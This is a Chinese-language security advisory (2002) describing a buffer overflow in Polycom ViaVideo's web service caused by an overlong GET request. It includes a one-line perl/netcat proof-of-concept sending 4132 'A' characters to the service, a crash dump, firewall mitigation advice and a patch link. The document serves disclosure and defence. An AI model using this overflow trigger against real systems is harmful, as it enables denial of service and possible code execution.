首页 -> 安全研究

安全研究

安全漏洞
Polycom ViaVideo Web组件超长GET请求远程拒绝服务攻击漏洞

发布日期:2002-10-13
更新日期:2002-10-17

受影响系统:
Polycom ViaVideo 3.0
Polycom ViaVideo 2.2
描述:
ViaVideo是一款由Polycom开发和维护的个人视频通信产品,使用ViaVideo,可以使用户面对面进行交流。ViaVideo包含WEB服务组件。

ViaVideo的WEB服务程序不能正确处理超长的GET请求,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。

由于ViaVideo的WEB服务程序对GET请求边界检查不正确,攻击者可以提交4132个字符的GET请求给WEB服务程序,就会导致WebWEB服务程序产生缓冲区溢出,精心构建提交数据可能导致以WEB进程的权限在系统上执行任意指令。

<*来源:advisory@prophecy.net.nzadvisory@prophecy.net.nz
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103463308030702&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

advisory@prophecy.net.nz 提供了如下测试方法:

perl -e 'print "GET " . "A" x 4132 . " HTTP/1.0\r\n\r\n";' | netcat 10.1.0.1 3603

Error message on host:
OS: Microsoft?Windows 2000(TM) 5.0 Service Pack 3 Build 2195
Version: Release 3.0  26Feb2002 3.0.0.144
ViaVideo.exe caused an EXCEPTION_ACCESS_VIOLATION in module vvws.dll at \
001B:67302ECE, CHttpSocket::ReadHeader()+0226 byte(s), \
H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line 1092+0002 \
byte(s) EAX=41414141  EBX=03D491C4  ECX=03D49190  EDX=00000001  ESI=03D49190
EDI=03D4A1E8  EBP=03B6D3F4  ESP=0586FF1C  EIP=67302ECE  FLG=00010202
CS=001B   DS=0023  SS=0023  ES=0023   FS=0038  GS=0000
001B:67302ECE (0x00000000 0x00000000 0x00000000 0x00000000) vvws.dll, \
CHttpSocket::ReadHeader()+0226 byte(s), \
H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line 1092+0002 \
byte(s)

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 使用防火墙对WEB接口进行正确的配置,限制非法用户访问。

厂商补丁:

Polycom
-------
Polycom提供了一个补丁,从如下地址下载:

http://www.polycom.com/securitycenter

浏览次数:2913
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障